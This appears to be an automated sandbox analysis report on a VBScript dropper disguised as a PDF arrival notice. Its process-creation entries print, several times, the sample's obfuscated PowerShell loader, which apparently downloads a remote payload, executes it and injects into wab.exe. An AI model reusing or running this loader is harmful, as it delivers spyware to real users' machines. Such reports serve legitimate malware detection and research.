Fordtjunki.lensaHNovemeDiakoaSam Jump to behavior
Detected potential crypto function
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FF886E4C342 3_2_00007FF886E4C342
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FF886E4B596 3_2_00007FF886E4B596
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_02EF41F8 12_2_02EF41F8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_02EF4AC8 12_2_02EF4AC8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_02EF3EB0 12_2_02EF3EB0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_28AE3BD8 12_2_28AE3BD8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_28AF68A8 12_2_28AF68A8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_28AFEA69 12_2_28AFEA69
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_28AF0040 12_2_28AF0040
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_28AF33E8 12_2_28AF33E8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_28AF89E0 12_2_28AF89E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_28AFB5C0 12_2_28AFB5C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_28AF5AB0 12_2_28AF5AB0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_28AFAEE0 12_2_28AFAEE0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_28AF911B 12_2_28AF911B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_28AF0011 12_2_28AF0011
Java / VBScript file with very long strings (likely obfuscated code)
Source: Arrival Notice PUS_pdf.vbs Initial sample: Strings found which are bigger than 50
Yara signature match
Source: amsi32_8108.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7660, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 8108, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winVBS@13/9@5/4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Australians.Hov Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7668:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_el1m15uv.qqi.ps1 Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Arrival Notice PUS_pdf.vbs"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7660
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=8108
Source: C:\Program Files (x86)\Windows Mail\wab.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: Arrival Notice PUS_pdf.vbs ReversingLabs: Detection: 13%
Source: Arrival Notice PUS_pdf.vbs Virustotal: Detection: 15%
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Arrival Notice PUS_pdf.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Klervske = 1;$Hengivnes='Substrin';$Hengivnes+='g';Function Banuyo17($Kolonihaves){$Paraglossia=$Kolonihaves.Length-$Klervske;For($Grazer=5; $Grazer -lt $Paraglossia; $Grazer+=(6)){$Fradrage249+=$Kolonihaves.$Hengivnes.Invoke($Grazer, $Klervske);}$Fradrage249;}function decoupled($Calorically){& ($Sommerperioden) ($Calorically);}$Brodfrs=Banuyo17 'B mbeMstillor,kalzRehoniGematlLacerlMatria asse/ P.oc5Klods.Sy.sl0Azotu prore( BjerWBuskaiUfejlnLigkad,yclooUdstawRessosStarn Cran,NArbejTKisse Depe1Kv te0Incre.O lys0 Nove; H na pathoWScrobiBndlenLoved6A.skr4Ma.ne;For a PresixOblig6Imper4Uophr;Fejlb KvalirShiitvTinct: Gru 1Carro2Le,kb1Diasy. Demu0Smi g) skin RumplGEnosteSolitc Fo hkCyma,o Blnd/Paape2H.rsk0 Doze1 ofma0Tasti0Unbad1Distr0Odont1Vag,e TosseFBrohoi Semir,yvsteBrnesf SkiroVelsexExuld/Bevis1Ujaev2Samos1Exter.Thwac0Sees ';$Stenotaphrum=Banuyo17 'Trbl,UKomplsStatseSmaalr Hj,o-Det,uALovfog ,asteForomn Un ntGreg ';$Amputationer=Banuyo17 'Sederh Ar.dtFremsttredip.luklsGalde: Ansk/Fr.ml/AntiadKvster MandiFripavSati.eG.lio. SikkgSeb soByto,oMaximgNontelBal ieEinar.SyntacArb.jo ,gebmBalda/InterugonofcOvera?TakeueUvistxKvit,pR,maioindberTranst Pree=CaissdPosteoBowlewCorn,n SteelUns.loMatera Boncd Besi&O erfiUnburdSynta=Prten1,aghuoPars lMelonGImper4underRSho.t0ExcurHtang,LUntrejAut eL,aben5Astho0Ton.dh u,viYGodkevMel eD IncruCylinsI.olaEUrtep_DistrSHyperTAfl s-KulbrCScrevKHugorhThermKImperIPadd r Db.f- FrasD.vervRNo,ar ';$Laservid=Banuyo17 'Mili.>.nten ';$Sommerperioden=Banuyo17 'Ga boiFor.seForndxV ars ';$pseudonitrosite = Banuyo17 'Bru,eeCr.chc P.coh.odomo.kuds Afsni%Sol,eaRe.sepUnderpTruand.icebaSavortSectiaUnder%Hangm\Ene gASkotjuSystesWopudt SprorAllosaIndsklPremiiGigg.a balln forssAmygd. AlsiHNormtoSt rmvCorka Chond& Sk u& Stan Sp,see Orn,cErhvehmonaroTerep .epu$ Coal ';decoupled (Banuyo17 'Overk$Kkkeng J,gelLivsooUd,tibSleepaphotolBarda:NewsdF Os.auMultilFe.tud TyphmTamaraKlaveaEllipnForsteParalrOptag=Stran(,torkc,anghmRea tdNerve Skunk/BrrencIndl Langb$UndulpIndh sPr.oceOrganuhemlidAust oLokalnTerroi ImmatTrombrR.dimoCon,es Lig i McmutdknaveMotor)Inds ');decoupled (Banuyo17 ',rnsk$F,stegSili lSaksnoPr.blbAghanaBeseelTriak:StaffBD wcooGallftGngerr undey CecelKo,gelEmotii.appedSnakea K ajeU.ret=Uddel$fyrinA,lutmm.osimpFra auBekentSubdeaCostltIndpoiCholaoSemiwnOpstaeBuffer Unsy.CommissynkrpMaterl PolliFlight Scra( Fusi$Fr igLlnsuma Cir.s MetaeKunstrModerv OptaibirgidFinge)Bidra ');$Amputationer=$Botryllidae[0];decoupled (Banuyo17 ',lyve$Ek,orgMiswrlTherioPlenubFedtiaLfterlTexti: temKFiskerIsocyeOvergm ubee Parar KicheDyna tOpspa= SvigNSvin,efibe,w Port-KrakeO urtzbhypopjGa,eke Unvocprfert Bulb sl,ghSDiscoy errasShanktErhere Ma gmSmert.DubioNHaworePrototSliv.. rojWFeneseKv,enb ,uriCMyreulStudei PrsteBssemnBogomtBeby ');decoupled (Banuyo17 'Arbej$JenirKStjerrbegiteBarsemHaandeudsidrMrke.e Fordtjunki.lensaHNovemeDiakoaSam
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Australians.Hov && echo $"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Klervske = 1;$Hengivnes='Substrin';$Hengivnes+='g';Function Banuyo17($Kolonihaves){$Paraglossia=$Kolonihaves.Length-$Klervske;For($Grazer=5; $Grazer -lt $Paraglossia; $Grazer+=(6)){$Fradrage249+=$Kolonihaves.$Hengivnes.Invoke($Grazer, $Klervske);}$Fradrage249;}function decoupled($Calorically){& ($Sommerperioden) ($Calorically);}$Brodfrs=Banuyo17 'B mbeMstillor,kalzRehoniGematlLacerlMatria asse/ P.oc5Klods.Sy.sl0Azotu prore( BjerWBuskaiUfejlnLigkad,yclooUdstawRessosStarn Cran,NArbejTKisse Depe1Kv te0Incre.O lys0 Nove; H na pathoWScrobiBndlenLoved6A.skr4Ma.ne;For a PresixOblig6Imper4Uophr;Fejlb KvalirShiitvTinct: Gru 1Carro2Le,kb1Diasy. Demu0Smi g) skin RumplGEnosteSolitc Fo hkCyma,o Blnd/Paape2H.rsk0 Doze1 ofma0Tasti0Unbad1Distr0Odont1Vag,e TosseFBrohoi Semir,yvsteBrnesf SkiroVelsexExuld/Bevis1Ujaev2Samos1Exter.Thwac0Sees ';$Stenotaphrum=Banuyo17 'Trbl,UKomplsStatseSmaalr Hj,o-Det,uALovfog ,asteForomn Un ntGreg ';$Amputationer=Banuyo17 'Sederh Ar.dtFremsttredip.luklsGalde: Ansk/Fr.ml/AntiadKvster MandiFripavSati.eG.lio. SikkgSeb soByto,oMaximgNontelBal ieEinar.SyntacArb.jo ,gebmBalda/InterugonofcOvera?TakeueUvistxKvit,pR,maioindberTranst Pree=CaissdPosteoBowlewCorn,n SteelUns.loMatera Boncd Besi&O erfiUnburdSynta=Prten1,aghuoPars lMelonGImper4underRSho.t0ExcurHtang,LUntrejAut eL,aben5Astho0Ton.dh u,viYGodkevMel eD IncruCylinsI.olaEUrtep_DistrSHyperTAfl s-KulbrCScrevKHugorhThermKImperIPadd r Db.f- FrasD.vervRNo,ar ';$Laservid=Banuyo17 'Mili.>.nten ';$Sommerperioden=Banuyo17 'Ga boiFor.seForndxV ars ';$pseudonitrosite = Banuyo17 'Bru,eeCr.chc P.coh.odomo.kuds Afsni%Sol,eaRe.sepUnderpTruand.icebaSavortSectiaUnder%Hangm\Ene gASkotjuSystesWopudt SprorAllosaIndsklPremiiGigg.a balln forssAmygd. AlsiHNormtoSt rmvCorka Chond& Sk u& Stan Sp,see Orn,cErhvehmonaroTerep .epu$ Coal ';decoupled (Banuyo17 'Overk$Kkkeng J,gelLivsooUd,tibSleepaphotolBarda:NewsdF Os.auMultilFe.tud TyphmTamaraKlaveaEllipnForsteParalrOptag=Stran(,torkc,anghmRea tdNerve Skunk/BrrencIndl Langb$UndulpIndh sPr.oceOrganuhemlidAust oLokalnTerroi ImmatTrombrR.dimoCon,es Lig i McmutdknaveMotor)Inds ');decoupled (Banuyo17 ',rnsk$F,stegSili lSaksnoPr.blbAghanaBeseelTriak:StaffBD wcooGallftGngerr undey CecelKo,gelEmotii.appedSnakea K ajeU.ret=Uddel$fyrinA,lutmm.osimpFra auBekentSubdeaCostltIndpoiCholaoSemiwnOpstaeBuffer Unsy.CommissynkrpMaterl PolliFlight Scra( Fusi$Fr igLlnsuma Cir.s MetaeKunstrModerv OptaibirgidFinge)Bidra ');$Amputationer=$Botryllidae[0];decoupled (Banuyo17 ',lyve$Ek,orgMiswrlTherioPlenubFedtiaLfterlTexti: temKFiskerIsocyeOvergm ubee Parar KicheDyna tOpspa= SvigNSvin,efibe,w Port-KrakeO urtzbhypopjGa,eke Unvocprfert Bulb sl,ghSDiscoy errasShanktErhere Ma gmSmert.DubioNHaworePrototSliv.. rojWFeneseKv,enb ,uriCMyreulStudei PrsteBssemnBogomtBeby ');decoupled (Banuyo17 'Arbej$JenirKStjerrbegiteBarsemHaandeudsidrMrke.e Fordtjunki.lensaHNovemeDiakoaSam
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Australians.Hov && echo $"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Klervske = 1;$Hengivnes='Substrin';$Hengivnes+='g';Function Banuyo17($Kolonihaves){$Paraglossia=$Kolonihaves.Length-$Klervske;For($Grazer=5; $Grazer -lt $Paraglossia; $Grazer+=(6)){$Fradrage249+=$Kolonihaves.$Hengivnes.Invoke($Grazer, $Klervske);}$Fradrage249;}function decoupled($Calorically){& ($Sommerperioden) ($Calorically);}$Brodfrs=Banuyo17 'B mbeMstillor,kalzRehoniGematlLacerlMatria asse/ P.oc5Klods.Sy.sl0Azotu prore( BjerWBuskaiUfejlnLigkad,yclooUdstawRessosStarn Cran,NArbejTKisse Depe1Kv te0Incre.O lys0 Nove; H na pathoWScrobiBndlenLoved6A.skr4Ma.ne;For a PresixOblig6Imper4Uophr;Fejlb KvalirShiitvTinct: Gru 1Carro2Le,kb1Diasy. Demu0Smi g) skin RumplGEnosteSolitc Fo hkCyma,o Blnd/Paape2H.rsk0 Doze1 ofma0Tasti0Unbad1Distr0Odont1Vag,e TosseFBrohoi Semir,yvsteBrnesf SkiroVelsexExuld/Bevis1Ujaev2Samos1Exter.Thwac0Sees ';$Stenotaphrum=Banuyo17 'Trbl,UKomplsStatseSmaalr Hj,o-Det,uALovfog ,asteForomn Un ntGreg ';$Amputationer=Banuyo17 'Sederh Ar.dtFremsttredip.luklsGalde: Ansk/Fr.ml/AntiadKvster MandiFripavSati.eG.lio. SikkgSeb soByto,oMaximgNontelBal ieEinar.SyntacArb.jo ,gebmBalda/InterugonofcOvera?TakeueUvistxKvit,pR,maioindberTranst Pree=CaissdPosteoBowlewCorn,n SteelUns.loMatera Boncd Besi&O erfiUnburdSynta=Prten1,aghuoPars lMelonGImper4underRSho.t0ExcurHtang,LUntrejAut eL,aben5Astho0Ton.dh u,viYGodkevMel eD IncruCylinsI.olaEUrtep_DistrSHyperTAfl s-KulbrCScrevKHugorhThermKImperIPadd r Db.f- FrasD.vervRNo,ar ';$Laservid=Banuyo17 'Mili.>.nten ';$Sommerperioden=Banuyo17 'Ga boiFor.seForndxV ars ';$pseudonitrosite = Banuyo17 'Bru,eeCr.chc P.coh.odomo.kuds Afsni%Sol,eaRe.sepUnderpTruand.icebaSavortSectiaUnder%Hangm\Ene gASkotjuSystesWopudt SprorAllosaIndsklPremiiGigg.a balln forssAmygd. AlsiHNormtoSt rmvCorka Chond& Sk u& Stan Sp,see Orn,cErhvehmonaroTerep .epu$ Coal ';decoupled (Banuyo17 'Overk$Kkkeng J,gelLivsooUd,tibSleepaphotolBarda:NewsdF Os.auMultilFe.tud TyphmTamaraKlaveaEllipnForsteParalrOptag=Stran(,torkc,anghmRea tdNerve Skunk/BrrencIndl Langb$UndulpIndh sPr.oceOrganuhemlidAust oLokalnTerroi ImmatTrombrR.dimoCon,es Lig i McmutdknaveMotor)Inds ');decoupled (Banuyo17 ',rnsk$F,stegSili lSaksnoPr.blbAghanaBeseelTriak:StaffBD wcooGallftGngerr undey CecelKo,gelEmotii.appedSnakea K ajeU.ret=Uddel$fyrinA,lutmm.osimpFra auBekentSubdeaCostltIndpoiCholaoSemiwnOpstaeBuffer Unsy.CommissynkrpMaterl PolliFlight Scra( Fusi$Fr igLlnsuma Cir.s MetaeKunstrModerv OptaibirgidFinge)Bidra ');$Amputationer=$Botryllidae[0];decoupled (Banuyo17 ',lyve$Ek,orgMiswrlTherioPlenubFedtiaLfterlTexti: temKFiskerIsocyeOvergm ubee Parar KicheDyna tOpspa= SvigNSvin,efibe,w Port-KrakeO urtzbhypopjGa,eke Unvocprfert Bulb sl,ghSDiscoy errasShanktErhere Ma gmSmert.DubioNHaworePrototSliv.. rojWFeneseKv,enb ,uriCMyreulStudei PrsteBssemnBogomtBeby ');decoupled (Banuyo17 'Arbej$JenirKStjerrbegiteBarsemHaandeudsidrMrke.e Fordtjunki.lensaHNovemeDiakoaSam Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Australians.Hov && echo $" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Klervske = 1;$Hengivnes='Substrin';$Hengivnes+='g';Function Banuyo17($Kolonihaves){$Paraglossia=$Kolonihaves.Length-$Klervske;For($Grazer=5; $Grazer -lt $Paraglossia; $Grazer+=(6)){$Fradrage249+=$Kolonihaves.$Hengivnes.Invoke($Grazer, $Klervske);}$Fradrage249;}function decoupled($Calorically){& ($Sommerperioden) ($Calorically);}$Brodfrs=Banuyo17 'B mbeMstillor,kalzRehoniGematlLacerlMatria asse/ P.oc5Klods.Sy.sl0Azotu prore( BjerWBuskaiUfejlnLigkad,yclooUdstawRessosStarn Cran,NArbejTKisse Depe1Kv te0Incre.O lys0 Nove; H na pathoWScrobiBndlenLoved6A.skr4Ma.ne;For a PresixOblig6Imper4Uophr;Fejlb KvalirShiitvTinct: Gru 1Carro2Le,kb1Diasy. Demu0Smi g) skin RumplGEnosteSolitc Fo hkCyma,o Blnd/Paape2H.rsk0 Doze1 ofma0Tasti0Unbad1Distr0Odont1Vag,e TosseFBrohoi Semir,yvsteBrnesf SkiroVelsexExuld/Bevis1Ujaev2Samos1Exter.Thwac0Sees ';$Stenotaphrum=Banuyo17 'Trbl,UKomplsStatseSmaalr Hj,o-Det,uALovfog ,asteForomn Un ntGreg ';$Amputationer=Banuyo17 'Sederh Ar.dtFremsttredip.luklsGalde: Ansk/Fr.ml/AntiadKvster MandiFripavSati.eG.lio. SikkgSeb soByto,oMaximgNontelBal ieEinar.SyntacArb.jo ,gebmBalda/InterugonofcOvera?TakeueUvistxKvit,pR,maioindberTranst Pree=CaissdPosteoBowlewCorn,n SteelUns.loMatera Boncd Besi&O erfiUnburdSynta=Prten1,aghuoPars lMelonGImper4underRSho.t0ExcurHtang,LUntrejAut eL,aben5Astho0Ton.dh u,viYGodkevMel eD IncruCylinsI.olaEUrtep_DistrSHyperTAfl s-KulbrCScrevKHugorhThermKImperIPadd r Db.f- FrasD.vervRNo,ar ';$Laservid=Banuyo17 'Mili.>.nten ';$Sommerperioden=Banuyo17 'Ga boiFor.seForndxV ars ';$pseudonitrosite = Banuyo17 'Bru,eeCr.chc P.coh.odomo.kuds Afsni%Sol,eaRe.sepUnderpTruand.icebaSavortSectiaUnder%Hangm\Ene gASkotjuSystesWopudt SprorAllosaIndsklPremiiGigg.a balln forssAmygd. AlsiHNormtoSt rmvCorka Chond& Sk u& Stan Sp,see Orn,cErhvehmonaroTerep .epu$ Coal ';decoupled (Banuyo17 'Overk$Kkkeng J,gelLivsooUd,tibSleepaphotolBarda:NewsdF Os.auMultilFe.tud TyphmTamaraKlaveaEllipnForsteParalrOptag=Stran(,torkc,anghmRea tdNerve Skunk/BrrencIndl Langb$UndulpIndh sPr.oceOrganuhemlidAust oLokalnTerroi ImmatTrombrR.dimoCon,es Lig i McmutdknaveMotor)Inds ');decoupled (Banuyo17 ',rnsk$F,stegSili lSaksnoPr.blbAghanaBeseelTriak:StaffBD wcooGallftGngerr undey CecelKo,gelEmotii.appedSnakea K ajeU.ret=Uddel$fyrinA,lutmm.osimpFra auBekentSubdeaCostltIndpoiCholaoSemiwnOpstaeBuffer Unsy.CommissynkrpMaterl PolliFlight Scra( Fusi$Fr igLlnsuma Cir.s MetaeKunstrModerv OptaibirgidFinge)Bidra ');$Amputationer=$Botryllidae[0];decoupled (Banuyo17 ',lyve$Ek,orgMiswrlTherioPlenubFedtiaLfterlTexti: temKFiskerIsocyeOvergm ubee Parar KicheDyna tOpspa= SvigNSvin,efibe,w Port-KrakeO urtzbhypopjGa,eke Unvocprfert Bulb sl,ghSDiscoy errasShanktErhere Ma gmSmert.DubioNHaworePrototSliv.. rojWFeneseKv,enb ,uriCMyreulStudei PrsteBssemnBogomtBeby ');decoupled (Banuyo17 'Arbej$JenirKStjerrbegiteBarsemHaandeudsidrMrke.e Fordtjunki.lensaHNovemeDiakoaSam Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Australians.Hov && echo $" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptnet.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cabinet.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: esscli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
